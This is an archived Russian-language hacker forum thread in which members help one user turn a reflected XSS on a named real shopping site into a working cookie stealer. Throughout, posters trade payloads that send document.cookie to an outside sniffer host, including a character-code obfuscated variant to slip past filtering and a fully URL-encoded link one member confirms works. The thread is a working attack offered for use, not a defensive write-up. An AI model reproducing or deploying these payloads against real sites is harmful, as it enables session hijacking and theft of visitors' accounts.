PDA

Просмотр полной версии : не шлются кукисы

popel
04.08.2008, 20:44
Допустим есть пассив xss, юзаю снифф каника
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua

заменяю на
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.hr ef='http://xxx.ru/s.gif?'+document.cookie%3C/script%3E&url=http://vital.h.com.ua не перенапрявляет на снифф=>кукисы не шлются
обрабатывается тока
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.hr ef='http://xxx.ru/s.gif'%3C/script%3E&url=http://vital.h.com.ua
Пробовал с разными xss
Не пинать)))
.nor
04.08.2008, 21:08
Вместо "xxx.ru/s.gif?" попробуй "http://xxx.ru/s.gif?"
popel
04.08.2008, 21:19
я так и делал, просто в теме неправильно указал, уже исправил
.nor
04.08.2008, 21:36
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script> Это робит?
freddi
04.08.2008, 21:48
? и + фильтруются.
Don1=2
04.08.2008, 21:50
"><script>img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47,47,120,1 20,120,46,114,117,47,115,46,103,105,102,63)+docume nt.cookie;</script>
или так
я имею ввиду http://xxx замени на String.fromCharCode(
можно на don12.vip.su
popel
04.08.2008, 22:09
пробовал вышеизложенное, не робит
на примере показать бы

http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('ggg')%3C/script%3E&url=http://vital.h.com.ua

заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
резальта нет( или неправильный код?)
.nor
04.08.2008, 22:16
я пробовал своим так http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
работает. Снифф точно рабочий?
popel
04.08.2008, 23:23
.nor, спс
Всё выполнилось, используя твой посл код))
тока после этого попробовал сам
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;%3C/script%3E - не робит)
Какой исходный код? без обработки браузером, а то хз %3D,%2F чего откуда)))))
[Raz0r]
04.08.2008, 23:33
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
.nor
04.08.2008, 23:35
Исходный "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
popel
04.08.2008, 23:47
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???

заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>

получаю нерабочий
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3E"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>%3C/script%3E
.nor
04.08.2008, 23:52
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???


"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>

заменять надо не alert('ggg'), а <script>alert('ggg')</script>
sabe
05.08.2008, 01:56
&url=http://vital.h.com.ua ))))))))))